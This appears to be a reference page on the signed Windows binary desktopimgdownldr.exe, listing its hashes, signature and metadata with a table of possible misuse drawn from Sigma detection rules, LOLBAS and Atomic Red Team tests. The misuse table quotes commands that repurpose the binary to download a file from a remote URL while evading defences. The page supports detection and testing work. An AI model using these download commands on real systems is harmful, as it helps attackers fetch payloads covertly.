desktopimgdownldr.exe

  • File Path: C:\Windows\system32\desktopimgdownldr.exe
  • Description: desktopimgdownldr.exe

Hashes

Type Hash
MD5 AECDFE9512F9ABF601B5B439FAA2B64A
SHA1 DD4E992C75E791094449FD52F646233C9AD06654
SHA256 1F336FA7255266CA76D26928DA7A2E0D4446F4CAE7F2041218BB2B166A97504D
SHA384 0607C22104D22394E41CCE21C6720AC85C5174926866B62FA4FF73FBD06704628BDF9EF52D71DDE6A44DE5A1C1931C49
SHA512 8DB2B94D74817B4B2B59B95CC7FEB9963CDCA372A8144634DFBB9258261B5AD6024B4BF37B48C73C51CEA417585FEFC1F45ED5080F4292AADEB7B6FC5878BCFB
SSDEEP 1536:OarCi80YW9i3P9fS+4mh1yUUt1Thu3SkJXDuMOI14uDLRS4Xe6KXQXQX+:nmYQhIt183SkJTuxuDdSkKAXb
IMP 4497ED51F6847EDEE6F31E6DE69B6378
PESHA1 0A683F53F11ED02115F415709AA60D2387EF9B0E
PE256 3E3017729AE251D02AEE1DE4F0571C297BD06231A74A9CB4EFD45AA6EC62F1EF

Runtime Data

Loaded Modules:

Path
C:\Windows\system32\desktopimgdownldr.exe
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: desktopimgdownldr.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/74
  • VirusTotal Link: https://www.virustotal.com/gui/file/1f336fa7255266ca76d26928da7a2e0d4446f4cae7f2041218bb2b166a97504d/detection

Possible Misuse

The following table contains possible examples of desktopimgdownldr.exe being misused. While desktopimgdownldr.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma file_event_win_susp_desktopimgdownldr_file.yml title: Suspicious Desktopimgdownldr Target File DRL 1.0
sigma file_event_win_susp_desktopimgdownldr_file.yml description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension DRL 1.0
sigma proc_creation_win_susp_copy_system32.yml description: Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name DRL 1.0
sigma proc_creation_win_susp_desktopimgdownldr.yml title: Suspicious Desktopimgdownldr Command DRL 1.0
sigma proc_creation_win_susp_desktopimgdownldr.yml description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet DRL 1.0
LOLBAS Desktopimgdownldr.yml Name: Desktopimgdownldr.exe  
LOLBAS Desktopimgdownldr.yml - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr  
LOLBAS Desktopimgdownldr.yml - Path: c:\windows\system32\desktopimgdownldr.exe  
LOLBAS Desktopimgdownldr.yml - IOC: desktopimgdownldr.exe that creates non-image file  
atomic-red-team index.md - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] MIT License. © 2018 Red Canary
atomic-red-team T1197.md - Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) MIT License. © 2018 Red Canary
atomic-red-team T1197.md ## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) MIT License. © 2018 Red Canary
atomic-red-team T1197.md This test simulates using desktopimgdownldr.exe to download a malicious file MIT License. © 2018 Red Canary
atomic-red-team T1197.md and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ MIT License. © 2018 Red Canary
atomic-red-team T1197.md set “#{download_path}” && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.